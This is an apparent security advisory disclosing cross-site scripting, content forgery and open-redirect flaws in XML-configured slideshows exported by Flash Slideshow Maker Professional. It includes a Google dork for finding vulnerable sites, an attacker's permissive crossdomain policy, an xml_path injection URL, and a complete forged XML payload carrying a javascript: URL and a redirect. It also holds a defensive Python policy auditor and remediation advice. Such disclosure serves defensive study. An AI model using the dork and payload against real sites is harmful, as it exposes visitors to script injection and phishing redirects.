
Flash Slideshow Maker Professional XSS / Content Forgery / Redirect

Posted Jul 29, 2017
Authored by ret2eax

Flash Slideshow Maker Professional suffers from content forgery, cross site scripting, and unvalidated redirection vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | c241b411c441ec7e0f4241ebd18bacfe

=================================================================================
_ _____ _____ _____
| | | _ | |____ | |____ |
| |__ | |/' |_ __ ___ / / ___ _ __ / /_ __
| '_ \| /| | '_ ` _ \ \ \/ __| '__| \ \ \ /\ / /
| | | \ |_/ / | | | | |.___/ / (__| | .___/ /\ V V /
|_| |_|\___/|_| |_| |_|\____/ \___|_| \____/ \_/\_/

> _[C O N T A C T] :
Twitter: @ret2eax
Email: ret2eax@riseup.net
Blog: ret2eax.pw
Website: hackthegrid.com.au

[+]-----------------------------------------------------------------[+]
| Impacted Vendor: SocuSoft Co. |
| Vulnerable Software: Flash Slideshow Maker Professional |
| Software URL: http://flash-slideshow-maker.com |
| Effected Release: All Versions |
| Vulnerability Type: Content Forgery, XSS, Unvalidated Redirects |
| Date Released: 29/07/2017 |
| Released by: ret2eax |
[+]-----------------------------------------------------------------[+]

=================================================================================

[+]----------------------------[ S U M M A R Y ]------------------------------[+]

Flash Slideshow Maker is a Flash Shockwave (SWF) movie maker that produces
slideshows of static images.

The vulnerability does not exist within the software application itself; instead,
it is present in the files the application exports.

The Flash Slideshow Maker application has two configuration themes for generating
slideshow content: basic and advanced.

The basic theme generates a single SWF file with all content embedded within it.
The 'advanced' theme, by contrast, is XML driven: the final output consists of the
SWF itself, the image files, and an XML document containing the configuration that
controls the SWF's behaviour. This 'advanced' theme configuration is the reason
the vulnerability exists.

Therefore the themes associated with the advanced configuration are vulnerable,
whereas content generated with the themes of the 'basic' configuration is not.

[+]-------------------------[ D E S C R I P T I O N ]------------------------[+]

This vulnerability exists not because of the SWF but because of the insecurity
of its XML configuration file, and the fact that the xml_path HTTP parameter
trusts user-supplied input. An attacker can pull the XML configuration that
defines the SWF's behavioural structure. Having done so, the attacker can mimic,
forge and thus alter the pre-defined behaviour of the SWF by assigning arbitrary
malicious values to the associated XML configuration parameters. Exploitation is
achieved by uploading the evil XML to a web server, from which it can then be
remotely called and included through the SWF via GET.

An attacker can perform Content Forgery, Unvalidated Redirect and XSS attacks
against authenticated and unauthenticated users by disseminating a compromised
URL.

For any of the vulnerabilities (besides Content Forgery, of course) to execute,
the victim is required to click on the image within the slides. The likelihood of
this can be increased through the XML configuration's title variables, by setting
the title to be statically displayed; the same persuasion could also be achieved
through Content Forgery, where a JPEG or any other image file can be displayed
containing text that persuades the victim to perform the required user
interaction.

[+]-----------------------[ P R E C O N D I T I O N S ]---------------------[+]

To exploit this vulnerability, the attacker must have a correctly configured
crossdomain policy running on the same server that hosts the malicious XML file.
An example is shown below:

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>
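As an added defensive check (not part of the advisory or the vendor's software), the following Python audits a crossdomain.xml and flags the permissive settings that the policy above relies on; both sample policies are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the fully permissive policy shown in the advisory.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>"""

# Constructed sample: a restrictive policy that admits a single named origin over HTTPS.
RESTRICTIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="www.example.com" secure="true"/>
</cross-domain-policy>"""

def audit_crossdomain_policy(xml_text):
    """Return a list of findings describing risky crossdomain.xml settings (empty if none)."""
    findings = []
    root = ET.fromstring(xml_text)  # expat does not fetch the external DTD
    if root.tag != "cross-domain-policy":
        return ["root element is not <cross-domain-policy>"]
    for sc in root.iter("site-control"):
        if sc.get("permitted-cross-domain-policies") == "all":
            findings.append("site-control permits arbitrary policy files (all)")
    for tag in ("allow-access-from", "allow-http-request-headers-from"):
        for el in root.iter(tag):
            dom = el.get("domain", "")
            if dom == "*":
                findings.append(f"{tag} grants access to every domain")
            elif dom.startswith("*."):
                findings.append(f"{tag} grants access to all subdomains of {dom[2:]!r}")
            # Flash treats a missing 'secure' attribute as true
            if el.get("secure", "true").lower() == "false":
                findings.append(f"{tag} for {dom!r} allows non-HTTPS loaders (secure=false)")
            if tag == "allow-http-request-headers-from" and el.get("headers") == "*":
                findings.append(f"{tag} for {dom!r} forwards every request header")
    return findings

if __name__ == "__main__":
    for finding in audit_crossdomain_policy(PERMISSIVE_POLICY):
        print("finding:", finding)
```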


[+]------------------------[ E X P L O I T A T I O N ]----------------------[+]

A Proof of Concept is as follows:

> _[The Basis] :

Vulnerable endpoints can be located through the following Google Dork:
filetype:swf inurl:?xml_path=

~ 64,500 potentially vulnerable endpoints match this criteria.

Obtain the SWF's XML configuration by replacing the .swf filename in the URL with
the .xml value passed in the xml_path HTTP parameter. Once obtained, edit the XML
configuration to control the SWF's behaviour. Finally, host it on a web server and
call it by setting the xml_path parameter to point to the manipulated XML config:
?xml_path=//domain.com/path/to/evil.xml. Again, to execute the XSS and evil
redirects, click on the image containing the associated payload.

> _[Example of Manipulated XML Config] :

<?xml version="1.0" encoding="UTF-8" ?>
<flash_parameters copyright="socusoftFSMTheme">
<preferences>
<global>
<basic_property movieWidth="480" movieHeight="400" html_title="Title" loadStyle="Bar" startAutoPlay="true" continuum="true" backgroundColor="0x005080" hideAdobeMenu="false" photoDynamicShow="true" enableURL="true" transitionArray=""/>
<title_property showTitle="true" photoTitleColor="0xff0000" backgroundColor="0xffffff" alpha="50" autoHide="true"/>
<music_property path="" stream="true" loop="true"/>
<photo_property topPadding="0" bottomPadding="40" leftPadding="0" rightPadding="0"/>
<properties enable="true" backgroundColor="0xffffff" backgroundAlpha="30" cssText="a:link{text-decoration: underline;} a:hover{color:#ff0000; text-decoration: none;} a:active{color:#0000ff;text-decoration: none;} .blue {color:#0000ff; font-size:15px; font-style:italic; text-decoration: underline;} .body{color:#ff5500;font-size:20px;}" align="bottom"/>
</global>
<thumbnail>
<basic_property showPrview="true" buttonColor="0xffffff" borderColor="0xffffff" currentBorderColor="0xffffff"/>
</thumbnail>
</preferences>
<album>
<slide jpegURL="foo.jpg" d_URL="foo.jpg" transition="0" panzoom="1" URLTarget="1" phototime="5" url="javascript:alert(document.domain)" title="XSS PoC by @ret2eax" width="480" height="360"/>
<slide jpegURL="bar.jpg" d_URL="bar.jpg" transition="29" panzoom="1" URLTarget="0" phototime="5" url="http://ret2eax.pw" title="Redirect PoC by @ret2eax" width="480" height="360"/>
</album>
</flash_parameters>

[+]------------------------[ R E M E D I A T I O N ]------------------------[+]

Perform proper input sanitization, and review the crossdomain policy to ensure it
is configured correctly, in the sense that it should disallow script access from
remote domains. Alternatively, remove the vulnerable content entirely.

=================================================================================
